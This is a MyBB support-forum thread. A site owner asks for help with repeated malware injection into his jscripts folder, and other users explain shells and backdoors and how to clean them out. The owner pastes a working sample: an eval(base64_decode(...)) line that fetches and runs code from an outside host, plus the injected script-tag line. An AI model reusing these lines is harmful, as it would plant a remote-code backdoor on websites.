MyBB Community Forums

Full Version: Infected with Malicious code repeatedly on Javascript files
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Hi all,

My website url is : http://uniqueminds.in

i am facing a serious security vulnerability on my website, as follows:

PHP code similar to the following line
document.write('<script src="/jscripts/css.php"></script>') 

will gets automatically added to my files in jscripts directory, intern css.php will be having some code similar to encoded code like: base64()

When i delete css.php and clean up the files, after 3 or 4 days, its getting added again & again repeatedly and so causing blacklisted by Google. How can i solve this issue.

Please help me to sort it out, if you have a similar experince..

Thanks in Advance
Sounds like you have a backdoor or something in your site. CHange your passwords and do a double check of all your web directories for suspicious files.
(2013-04-03, 08:39 AM)Euan T Wrote: [ -> ]Sounds like you have a backdoor or something in your site. CHange your passwords and do a double check of all your web directories for suspicious files.

You should also make a database backup. But yes as Euan says, try to detect any suspicious files in your FTP. As for the part where your css.php keeps reappearing, it could be a shell that your attacker keeps adding. For checking if that is a shell, go to this URL.

http://www.yourwebsite.com/css.php
Mind uploading the source of css.php? Would be interested in decoding it to find what it is.
You have a shell in your files somewhere. Clean them all out.
(2013-04-06, 06:16 PM)stalls Wrote: [ -> ]Mind uploading the source of css.php? Would be interested in decoding it to find what it is.

This code will be similar to like this bro.
 eval(base64_decode('aWYoQGZvcGVuKCdodHRwOi8vaHJoZXJvLmNvbS9iaW9
zL2Jpb3MudHh0JywgJ3InKSkgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c
DovL2hyaGVyby5jb20vYmlvcy9iaW9zLnR4dCcpKTs=l');  

(2013-04-06, 11:53 PM)labrocca Wrote: [ -> ]You have a shell in your files somewhere. Clean them all out.

Can you please let me know, what is shell in files? I am not sure what you are saying about.
A shell is also commonly known as a backdoor. It allows an attacker to regain access or reinfect you. Check every folder and compare the contents with a new MyBB download. Any files that you do not specifically know about are red flags.

Any file could theoretically be infecting you though, if code was added to a normal file. So check the last modified date and check any files last modified near when the compromise was noticed.
this is the file having encrypted code (Google saying Malicious code) that is being upload to my jscripts dir: